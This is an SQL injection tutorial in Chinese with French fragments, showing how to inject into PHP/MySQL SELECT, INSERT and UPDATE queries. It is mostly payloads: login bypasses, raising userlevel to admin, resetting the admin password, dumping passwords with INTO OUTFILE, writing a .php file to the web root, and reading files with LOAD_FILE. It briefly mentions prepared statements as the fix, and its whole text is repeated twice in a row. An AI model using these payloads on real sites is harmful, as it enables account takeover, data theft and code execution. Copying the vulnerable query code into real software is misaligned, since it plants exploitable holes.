PHP 注入（精简版，小夜整理，部分地方加了注释）。
本文比较细致，主要介绍三种 SQL 语句的注入方法（示例基于 PHP + MySQL：`#` 行注释、INTO OUTFILE/DUMPFILE、LOAD_FILE 等都是 MySQL 特性）：
1- select
2- insert
3- update
根本原因是把用户输入直接拼进 SQL 字符串；正确的修复是用预处理语句绑定参数（mysqli/PDO prepared statements），而列名这类标识符（如下文的 ORDER BY $orderby）无法绑定，只能按白名单校验。
$req = "select * FROM membres where name like '%$search%' ORDER BY name"
où $search est la variable modifiable par l'utilisateur, venant d'un formulaire POST (ou d'une autre source) de ce type. (Remarque : le formulaire ci-dessous affiche $PHP_SELF sans échappement dans l'attribut action, ce qui est en soi un XSS réfléchi ; utiliser htmlspecialchars($_SERVER['PHP_SELF']) ou une action fixe.)
<form method="POST" action="<? echo $PHP_SELF; ?>">
<input type="text" name="search"><br>
<input type="submit" value="Search">
</form>
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
$req = "select uid FROM admins where login='$login' AND password='$pass'"
select * FROM table where 1=1
select * FROM table where 'uuu'='uuu'
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵.
select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a'
select uid FROM admins where login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'
select * FROM table where nom='Jack'# commentaire
select * FROM table where nom='Jack'
select * FROM table where /* commentaires */ addresse='25 rue des roubys'
select * FROM table where addresse='25 rue des roubys'
select uid FROM admins where login='John'#' AND password=''
select uid FROM admins where login='' OR admin_level=1#' AND password=''
$req = "select password FROM admins where login='$login'"
select * FROM table INTO OUTFILE '/complete/path/to/file.txt' ---- 将表导出到文件。注意：INTO OUTFILE/DUMPFILE 要求数据库账号有 FILE 权限，文件由 mysqld 进程写出（目录须对它可写、目标文件不能已存在，并受 secure_file_priv 限制）；只有写进 Web 根目录，攻击者才能通过 HTTP 读到。
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
然后通过 http://[target]/file.txt 读取导出的内容。
同理，把 $login 填为 frog' INTO OUTFILE '/path/to/site/file.php （原语句末尾的引号正好闭合路径），查询结果就会被写成 Web 根目录下的 .php 文件，随后由服务器当作脚本执行。
$req = "select uid FROM membres where login='$login' AND password='$pass'"
select * FROM table where msg like '%hop'
select * FROM table where msg like 'hop%'
select * FROM table where msg like '%hop%'
select * FROM table where msg like 'h%p'
select * FROM table where msg like 'h_p'
select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''
select uid FROM membres where login='Bob' AND LENGTH(password)=6#' AND password=''
$req = "select email, website FROM membres where name like '%$search%' ORDER BY name"
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
$req = "select email, website FROM membres where name like '%$search%' ORDER BY $orderby"
以上是 select 语句的注入，这些技巧上面已经提到过（注意最后一例的 ORDER BY $orderby：列名不在引号里，转义无效，只能白名单校验）。继续看 insert。
insert :
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query1 = "insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')"
insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint default '1',
PRIMARY KEY (id)
)
$query2 = "insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"
insert INTO membres SET login='',password='',nom='',userlevel='3',email=''
create TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query3 = "insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')"
insert INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','a@a.a','3')#','1')
可见，insert 注入的关键是用 ') 提前闭合 VALUES 列表、把想要的 userlevel 塞进去，再用 # 注释掉原语句剩下的部分。（第三个例子的 INSERT 没写列名，列的顺序只能从表结构推测。）继续看 update。
update的利用
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$sql = "update membres SET password='$pass',nom='$nom',email='$email' where id='$id'"
update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]'
update membres SET password='[nouveaupass]' where nom='Admin'#',nom='[NOM]',email=' ' where id='[ID]'
update membres SET password='[nouveaupass]' where nom='Admin'
update membres SET password='[PASS]',nom='[NOM]',email=' ' where id='' OR nom='Admin'
create TABLE news (
idnews int(10) NOT NULL auto_increment,
title varchar(50),
author varchar(20),
news text,
Votes int(5),
score int(15),
PRIMARY KEY (idnews)
)
$sql = "update news SET Votes=Votes+1, score=score+$note where idnews='$id'"
update news SET Votes=Votes+1, score=score+3, title='hop' where idnews='12'
update news SET Votes=Votes+1, score=score+3,Votes=0 where idnews='12'
update news SET Votes=Votes+1, score=score+3, title=char(104,111,112) where idnews='12'
la fonction ASCII() ou ORD(). ASCII('h') et ORD('h')
update news SET Votes=Votes+1, score=score+3, title=0x616263 where idnews='12'
（0x616263 即 'abc' 的十六进制写法，不需要引号；进制转换可用 CONV，例如 select CONV("abc",16,3), CONV("abc",16,8)）
DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() )
update news SET Votes=Votes+1, score=score+3, title=DATABASE() where idnews='12'
update news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') where idnews='12' ---- LOAD_FILE 同样要求 FILE 权限，且文件须对 mysqld 进程可读并符合 secure_file_priv，否则返回 NULL。
本文比较细致，主要介绍三种 SQL 语句的注入方法（示例基于 PHP + MySQL：`#` 行注释、INTO OUTFILE/DUMPFILE、LOAD_FILE 等都是 MySQL 特性）：
1- select
2- insert
3- update
根本原因是把用户输入直接拼进 SQL 字符串；正确的修复是用预处理语句绑定参数（mysqli/PDO prepared statements），而列名这类标识符（如下文的 ORDER BY $orderby）无法绑定，只能按白名单校验。
$req = "select * FROM membres where name like '%$search%' ORDER BY name"
où $search est la variable modifiable par l'utilisateur, venant d'un formulaire POST (ou d'une autre source) de ce type. (Remarque : le formulaire ci-dessous affiche $PHP_SELF sans échappement dans l'attribut action, ce qui est en soi un XSS réfléchi ; utiliser htmlspecialchars($_SERVER['PHP_SELF']) ou une action fixe.)
<form method="POST" action="<? echo $PHP_SELF; ?>">
<input type="text" name="search"><br>
<input type="submit" value="Search">
</form>
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
$req = "select uid FROM admins where login='$login' AND password='$pass'"
select * FROM table where 1=1
select * FROM table where 'uuu'='uuu'
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵.
select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a'
select uid FROM admins where login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'
select * FROM table where nom='Jack'# commentaire
select * FROM table where nom='Jack'
select * FROM table where /* commentaires */ addresse='25 rue des roubys'
select * FROM table where addresse='25 rue des roubys'
select uid FROM admins where login='John'#' AND password=''
select uid FROM admins where login='' OR admin_level=1#' AND password=''
$req = "select password FROM admins where login='$login'"
select * FROM table INTO OUTFILE '/complete/path/to/file.txt' ---- 将表导出到文件。注意：INTO OUTFILE/DUMPFILE 要求数据库账号有 FILE 权限，文件由 mysqld 进程写出（目录须对它可写、目标文件不能已存在，并受 secure_file_priv 限制）；只有写进 Web 根目录，攻击者才能通过 HTTP 读到。
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
然后通过 http://[target]/file.txt 读取导出的内容。
同理，把 $login 填为 frog' INTO OUTFILE '/path/to/site/file.php （原语句末尾的引号正好闭合路径），查询结果就会被写成 Web 根目录下的 .php 文件，随后由服务器当作脚本执行。
$req = "select uid FROM membres where login='$login' AND password='$pass'"
select * FROM table where msg like '%hop'
select * FROM table where msg like 'hop%'
select * FROM table where msg like '%hop%'
select * FROM table where msg like 'h%p'
select * FROM table where msg like 'h_p'
select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''
select uid FROM membres where login='Bob' AND LENGTH(password)=6#' AND password=''
$req = "select email, website FROM membres where name like '%$search%' ORDER BY name"
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
$req = "select email, website FROM membres where name like '%$search%' ORDER BY $orderby"
以上是 select 语句的注入，这些技巧上面已经提到过（注意最后一例的 ORDER BY $orderby：列名不在引号里，转义无效，只能白名单校验）。继续看 insert。
insert :
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query1 = "insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')"
insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint default '1',
PRIMARY KEY (id)
)
$query2 = "insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"
insert INTO membres SET login='',password='',nom='',userlevel='3',email=''
create TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query3 = "insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')"
insert INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','a@a.a','3')#','1')
可见，insert 注入的关键是用 ') 提前闭合 VALUES 列表、把想要的 userlevel 塞进去，再用 # 注释掉原语句剩下的部分。（第三个例子的 INSERT 没写列名，列的顺序只能从表结构推测。）继续看 update。
update的利用
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$sql = "update membres SET password='$pass',nom='$nom',email='$email' where id='$id'"
update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]'
update membres SET password='[nouveaupass]' where nom='Admin'#',nom='[NOM]',email=' ' where id='[ID]'
update membres SET password='[nouveaupass]' where nom='Admin'
update membres SET password='[PASS]',nom='[NOM]',email=' ' where id='' OR nom='Admin'
create TABLE news (
idnews int(10) NOT NULL auto_increment,
title varchar(50),
author varchar(20),
news text,
Votes int(5),
score int(15),
PRIMARY KEY (idnews)
)
$sql = "update news SET Votes=Votes+1, score=score+$note where idnews='$id'"
update news SET Votes=Votes+1, score=score+3, title='hop' where idnews='12'
update news SET Votes=Votes+1, score=score+3,Votes=0 where idnews='12'
update news SET Votes=Votes+1, score=score+3, title=char(104,111,112) where idnews='12'
la fonction ASCII() ou ORD(). ASCII('h') et ORD('h')
update news SET Votes=Votes+1, score=score+3, title=0x616263 where idnews='12'
（0x616263 即 'abc' 的十六进制写法，不需要引号；进制转换可用 CONV，例如 select CONV("abc",16,3), CONV("abc",16,8)）
DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() )
update news SET Votes=Votes+1, score=score+3, title=DATABASE() where idnews='12'
update news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') where idnews='12' ---- LOAD_FILE 同样要求 FILE 权限，且文件须对 mysqld 进程可读并符合 secure_file_priv，否则返回 NULL。